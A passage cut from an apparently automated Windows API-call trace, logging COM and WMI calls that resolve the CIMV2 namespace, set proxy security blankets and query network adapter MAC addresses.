WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef34*=0x15, pszText=0x0) returned 0x0 [0065.176] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.176] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.176] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.176] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.176] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.176] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef34*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.176] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.183] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2edd0*=0x420, lpdwindex=0xf2ec2c | out: lpdwindex=0xf2ec2c) returned 0x0 [0065.194] CoGetContextToken (in: pToken=0xf2ee1c | out: pToken=0xf2ee1c) returned 0x0 [0065.194] CoGetContextToken (in: pToken=0xf2edc8 | out: pToken=0xf2edc8) returned 0x0 [0065.194] IUnknown:QueryInterface (in: This=0x126b548, riid=0x7444db1c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2ed9c | out: ppvObject=0xf2ed9c*=0x126b558) returned 0x0 [0065.194] CObjectContext::ContextCallback () returned 0x0 [0065.195] IUnknown:Release (This=0x126b558) returned 0x1 [0065.195] CoUnmarshalInterface (in: pStm=0x12aa5f8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xf2ee20 | out: ppv=0xf2ee20*=0x12b6640) returned 0x0 [0065.195] CoMarshalInterface (pStm=0x12aa5f8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12b6640, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0065.195] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2ea40 | out: ppvObject=0xf2ea40*=0x12b6640) returned 0x0 [0065.196] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e9fc | out: ppvObject=0xf2e9fc*=0x0) returned 0x80004002 [0065.196] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e8f0 | out: ppvObject=0xf2e8f0*=0x0) returned 0x80004002 [0065.196] WbemLocator:IUnknown:AddRef (This=0x12b6640) returned 0x3 [0065.196] CoGetContextToken (in: pToken=0xf2e888 | out: pToken=0xf2e888) returned 0x0 [0065.196] CoGetContextToken (in: pToken=0xf2e84c | out: pToken=0xf2e84c) returned 0x0 [0065.196] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e880 | out: ppvObject=0xf2e880*=0x126b49c) returned 0x0 [0065.196] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e8b0 | out: pAptType=0xf2e8b0*=3) returned 0x0 [0065.196] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.197] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e870 | out: ppvObject=0xf2e870*=0x12b659c) returned 0x0 [0065.197] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b659c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e878 | out: pCid=0xf2e878*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.197] WbemLocator:IUnknown:Release (This=0x12b659c) returned 0x3 [0065.197] CoGetContextToken (in: pToken=0xf2e880 | out: pToken=0xf2e880) returned 0x0 [0065.197] WbemLocator:IUnknown:AddRef (This=0x12b6640) returned 0x4 [0065.197] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e8f4 | out: ppvObject=0xf2e8f4*=0x12b6624) returned 0x0 [0065.197] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x4 [0065.197] WbemLocator:IRpcOptions:Query (in: This=0x12b6624, pPrx=0x12b6640, dwProperty=2, pdwValue=0xf2e918 | out: pdwValue=0xf2e918) returned 0x0 [0065.197] WbemLocator:IUnknown:Release (This=0x12b6624) returned 0x3 [0065.197] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x2 [0065.197] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x1 [0065.197] CoGetContextToken (in: pToken=0xf2e8dc | out: pToken=0xf2e8dc) returned 0x0 [0065.197] WbemLocator:IUnknown:AddRef (This=0x12b6640) returned 0x2 [0065.197] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb80 | out: ppvObject=0xf2eb80*=0x12b661c) returned 0x0 [0065.198] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12b661c, pProxy=0x12b6640, pAuthnSvc=0xf2ebc8, pAuthzSvc=0xf2ebc4, pServerPrincName=0xf2ebd4, pAuthnLevel=0xf2ebcc, pImpLevel=0xf2ebb8, pAuthInfo=0xf2ebbc, pCapabilites=0xf2ebc0 | out: pAuthnSvc=0xf2ebc8*=0xa, pAuthzSvc=0xf2ebc4*=0x0, pServerPrincName=0xf2ebd4, pAuthnLevel=0xf2ebcc*=0x6, pImpLevel=0xf2ebb8*=0x2, pAuthInfo=0xf2ebbc, pCapabilites=0xf2ebc0*=0x1) returned 0x0 [0065.198] WbemLocator:IUnknown:Release (This=0x12b661c) returned 0x2 [0065.198] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb74 | out: ppvObject=0xf2eb74*=0x12b6640) returned 0x0 [0065.198] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb70 | out: ppvObject=0xf2eb70*=0x12b661c) returned 0x0 [0065.198] WbemLocator:IClientSecurity:SetBlanket (This=0x12b661c, pProxy=0x12b6640, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0065.198] WbemLocator:IUnknown:Release (This=0x12b661c) returned 0x3 [0065.198] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x2 [0065.198] CoTaskMemFree (pv=0x12b7990) [0065.198] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x1 [0065.198] SysStringLen (param_1=0x0) returned 0x0 [0065.198] GetLastError () returned 0x0 [0065.198] CoGetContextToken (in: pToken=0xf2ecfc | out: pToken=0xf2ecfc) returned 0x0 [0065.198] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.198] WbemLocator:IUnknown:AddRef (This=0x12b6640) returned 0x2 [0065.198] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0xf2ed38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xf2ed34 | out: ppvObject=0xf2ed34*=0x1282948) returned 0x0 [0065.199] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x2 [0065.199] WbemLocator:IUnknown:Release (This=0x1282948) returned 0x1 [0065.199] CoGetContextToken (in: pToken=0xf2e890 | out: pToken=0xf2e890) returned 0x0 [0065.199] CoGetContextToken (in: pToken=0xf2e850 | out: pToken=0xf2e850) returned 0x0 [0065.199] WbemLocator:IUnknown:AddRef (This=0x12b6640) returned 0x2 [0065.199] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6640, riid=0xf2e8cc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xf2e8c8 | out: ppvObject=0xf2e8c8*=0x1282948) returned 0x0 [0065.199] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x2 [0065.199] WbemLocator:IUnknown:AddRef (This=0x1282948) returned 0x3 [0065.199] WbemLocator:IUnknown:QueryInterface (in: This=0x1282948, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb80 | out: ppvObject=0xf2eb80*=0x12b661c) returned 0x0 [0065.199] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12b661c, pProxy=0x1282948, pAuthnSvc=0xf2ebc8, pAuthzSvc=0xf2ebc4, pServerPrincName=0xf2ebd4, pAuthnLevel=0xf2ebcc, pImpLevel=0xf2ebb8, pAuthInfo=0xf2ebbc, pCapabilites=0xf2ebc0 | out: pAuthnSvc=0xf2ebc8*=0xa, pAuthzSvc=0xf2ebc4*=0x0, pServerPrincName=0xf2ebd4, pAuthnLevel=0xf2ebcc*=0x6, pImpLevel=0xf2ebb8*=0x2, pAuthInfo=0xf2ebbc, pCapabilites=0xf2ebc0*=0x1) returned 0x0 [0065.199] WbemLocator:IUnknown:Release (This=0x12b661c) returned 0x3 [0065.199] WbemLocator:IUnknown:QueryInterface (in: This=0x1282948, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb74 | out: ppvObject=0xf2eb74*=0x12b6640) returned 0x0 [0065.199] WbemLocator:IUnknown:QueryInterface (in: This=0x1282948, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb70 | out: ppvObject=0xf2eb70*=0x12b661c) returned 0x0 [0065.199] WbemLocator:IClientSecurity:SetBlanket (This=0x12b661c, pProxy=0x1282948, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0065.199] WbemLocator:IUnknown:Release (This=0x12b661c) returned 0x4 [0065.199] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x3 [0065.199] CoTaskMemFree (pv=0x12b78d0) [0065.200] WbemLocator:IUnknown:Release (This=0x1282948) returned 0x2 [0065.200] SysStringLen (param_1=0x0) returned 0x0 [0065.200] GetLastError () returned 0x0 [0065.200] CoGetContextToken (in: pToken=0xf2e620 | out: pToken=0xf2e620) returned 0x0 [0065.200] WbemLocator:IUnknown:AddRef (This=0x1282948) returned 0x3 [0065.200] IWbemServices:ExecQuery (in: This=0x1282948, strQueryLanguage="WQL", strQuery="SELECT MacAddress FROM Win32_NetworkAdapterConfiguration ", lFlags=16, pCtx=0x0, ppEnum=0xf2ec64 | out: ppEnum=0xf2ec64*=0x12b84f0) returned 0x0 [0065.202] IUnknown:QueryInterface (in: This=0x12b84f0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e910 | out: ppvObject=0xf2e910*=0x12b84f4) returned 0x0 [0065.207] IClientSecurity:QueryBlanket (in: This=0x12b84f4, pProxy=0x12b84f0, pAuthnSvc=0xf2e958, pAuthzSvc=0xf2e954, pServerPrincName=0xf2e964, pAuthnLevel=0xf2e95c, pImpLevel=0xf2e948, pAuthInfo=0xf2e94c, pCapabilites=0xf2e950 | out: pAuthnSvc=0xf2e958*=0xa, pAuthzSvc=0xf2e954*=0x0, pServerPrincName=0xf2e964, pAuthnLevel=0xf2e95c*=0x6, pImpLevel=0xf2e948*=0x2, pAuthInfo=0xf2e94c, pCapabilites=0xf2e950*=0x1) returned 0x0 [0065.207] IUnknown:Release (This=0x12b84f4) returned 0x1 [0065.207] IUnknown:QueryInterface (in: This=0x12b84f0, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e904 | out: ppvObject=0xf2e904*=0x12b6140) returned 0x0 [0065.207] IUnknown:QueryInterface (in: This=0x12b84f0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e900 | out: ppvObject=0xf2e900*=0x12b84f4) returned 0x0 [0065.207] IClientSecurity:SetBlanket (This=0x12b84f4, pProxy=0x12b84f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0065.208] IUnknown:Release (This=0x12b84f4) returned 0x2 [0065.208] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x1 [0065.208] CoTaskMemFree (pv=0x12b7b10) [0065.209] WbemLocator:IUnknown:Release (This=0x1282948) returned 0x2 [0065.209] IUnknown:QueryInterface (in: This=0x12b84f0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2bc | out: ppvObject=0xf2e2bc*=0x12b6140) returned 0x0 [0065.209] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e278 | out: ppvObject=0xf2e278*=0x0) returned 0x80004002 [0065.209] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e16c | out: ppvObject=0xf2e16c*=0x0) returned 0x80004002 [0065.209] WbemLocator:IUnknown:AddRef (This=0x12b6140) returned 0x3 [0065.209] CoGetContextToken (in: pToken=0xf2e104 | out: pToken=0xf2e104) returned 0x0 [0065.209] CoGetContextToken (in: pToken=0xf2e0c8 | out: pToken=0xf2e0c8) returned 0x0 [0065.209] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0fc | out: ppvObject=0xf2e0fc*=0x126b49c) returned 0x0 [0065.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e12c | out: pAptType=0xf2e12c*=3) returned 0x0 [0065.210] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.210] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0ec | out: ppvObject=0xf2e0ec*=0x12b609c) returned 0x0 [0065.210] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b609c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e0f4 | out: pCid=0xf2e0f4*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.210] WbemLocator:IUnknown:Release (This=0x12b609c) returned 0x3 [0065.210] CoGetContextToken (in: pToken=0xf2e0fc | out: pToken=0xf2e0fc) returned 0x0 [0065.210] WbemLocator:IUnknown:AddRef (This=0x12b6140) returned 0x4 [0065.210] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e170 | out: ppvObject=0xf2e170*=0x12b6124) returned 0x0 [0065.210] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x4 [0065.210] WbemLocator:IRpcOptions:Query (in: This=0x12b6124, pPrx=0x12b6140, dwProperty=2, pdwValue=0xf2e194 | out: pdwValue=0xf2e194) returned 0x80004002 [0065.210] WbemLocator:IUnknown:Release (This=0x12b6124) returned 0x3 [0065.210] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x2 [0065.210] CoGetContextToken (in: pToken=0xf2e570 | out: pToken=0xf2e570) returned 0x0 [0065.210] CoGetContextToken (in: pToken=0xf2e530 | out: pToken=0xf2e530) returned 0x0 [0065.210] WbemLocator:IUnknown:AddRef (This=0x12b6140) returned 0x3 [0065.210] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0xf2e5ac*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e5a8 | out: ppvObject=0xf2e5a8*=0x12b84f0) returned 0x0 [0065.211] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x3 [0065.211] IUnknown:Release (This=0x12b84f0) returned 0x2 [0065.211] IUnknown:Release (This=0x12b84f0) returned 0x1 [0065.211] SysStringLen (param_1=0x0) returned 0x0 [0065.211] GetLastError () returned 0x0 [0065.211] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.211] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.211] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.211] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2eefc | out: puCount=0xf2eefc*=0x2) returned 0x0 [0065.211] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.211] CoGetContextToken (in: pToken=0xf2ed38 | out: pToken=0xf2ed38) returned 0x0 [0065.211] CoGetContextToken (in: pToken=0xf2ecf8 | out: pToken=0xf2ecf8) returned 0x0 [0065.211] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed74*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed70 | out: ppvObject=0xf2ed70*=0x12b3f50) returned 0x0 [0065.211] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.211] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2eef8*=0x0, pszText=0x0 | out: puBuffLength=0xf2eef8*=0x15, pszText=0x0) returned 0x0 [0065.211] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.212] CoGetContextToken (in: pToken=0xf2ed38 | out: pToken=0xf2ed38) returned 0x0 [0065.212] CoGetContextToken (in: pToken=0xf2ecf8 | out: pToken=0xf2ecf8) returned 0x0 [0065.212] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed74*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed70 | out: ppvObject=0xf2ed70*=0x12b3f50) returned 0x0 [0065.212] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.212] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2eef8*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2eef8*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.212] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.212] CoGetContextToken (in: pToken=0xf2e898 | out: pToken=0xf2e898) returned 0x0 [0065.212] CoGetContextToken (in: pToken=0xf2e858 | out: pToken=0xf2e858) returned 0x0 [0065.212] WbemLocator:IUnknown:AddRef (This=0x12b6140) returned 0x2 [0065.212] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6140, riid=0xf2e8d4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e8d0 | out: ppvObject=0xf2e8d0*=0x12b84f0) returned 0x0 [0065.212] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x2 [0065.212] IUnknown:AddRef (This=0x12b84f0) returned 0x3 [0065.212] IEnumWbemClassObject:Clone (in: This=0x12b84f0, ppEnum=0xf2eecc | out: ppEnum=0xf2eecc*=0x12b85b8) returned 0x0 [0065.213] IUnknown:QueryInterface (in: This=0x12b85b8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb88 | out: ppvObject=0xf2eb88*=0x12b85bc) returned 0x0 [0065.213] IClientSecurity:QueryBlanket (in: This=0x12b85bc, pProxy=0x12b85b8, pAuthnSvc=0xf2ebd0, pAuthzSvc=0xf2ebcc, pServerPrincName=0xf2ebdc, pAuthnLevel=0xf2ebd4, pImpLevel=0xf2ebc0, pAuthInfo=0xf2ebc4, pCapabilites=0xf2ebc8 | out: pAuthnSvc=0xf2ebd0*=0xa, pAuthzSvc=0xf2ebcc*=0x0, pServerPrincName=0xf2ebdc, pAuthnLevel=0xf2ebd4*=0x6, pImpLevel=0xf2ebc0*=0x2, pAuthInfo=0xf2ebc4, pCapabilites=0xf2ebc8*=0x1) returned 0x0 [0065.213] IUnknown:Release (This=0x12b85bc) returned 0x1 [0065.213] IUnknown:QueryInterface (in: This=0x12b85b8, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb7c | out: ppvObject=0xf2eb7c*=0x12b5240) returned 0x0 [0065.213] IUnknown:QueryInterface (in: This=0x12b85b8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb78 | out: ppvObject=0xf2eb78*=0x12b85bc) returned 0x0 [0065.213] IClientSecurity:SetBlanket (This=0x12b85bc, pProxy=0x12b85b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0065.217] IUnknown:Release (This=0x12b85bc) returned 0x2 [0065.217] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x1 [0065.217] CoTaskMemFree (pv=0x12b79f0) [0065.217] IUnknown:Release (This=0x12b84f0) returned 0x2 [0065.217] IUnknown:QueryInterface (in: This=0x12b85b8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e524 | out: ppvObject=0xf2e524*=0x12b5240) returned 0x0 [0065.217] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e4e0 | out: ppvObject=0xf2e4e0*=0x0) returned 0x80004002 [0065.218] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e3d4 | out: ppvObject=0xf2e3d4*=0x0) returned 0x80004002 [0065.218] WbemLocator:IUnknown:AddRef (This=0x12b5240) returned 0x3 [0065.218] CoGetContextToken (in: pToken=0xf2e36c | out: pToken=0xf2e36c) returned 0x0 [0065.219] CoGetContextToken (in: pToken=0xf2e330 | out: pToken=0xf2e330) returned 0x0 [0065.219] 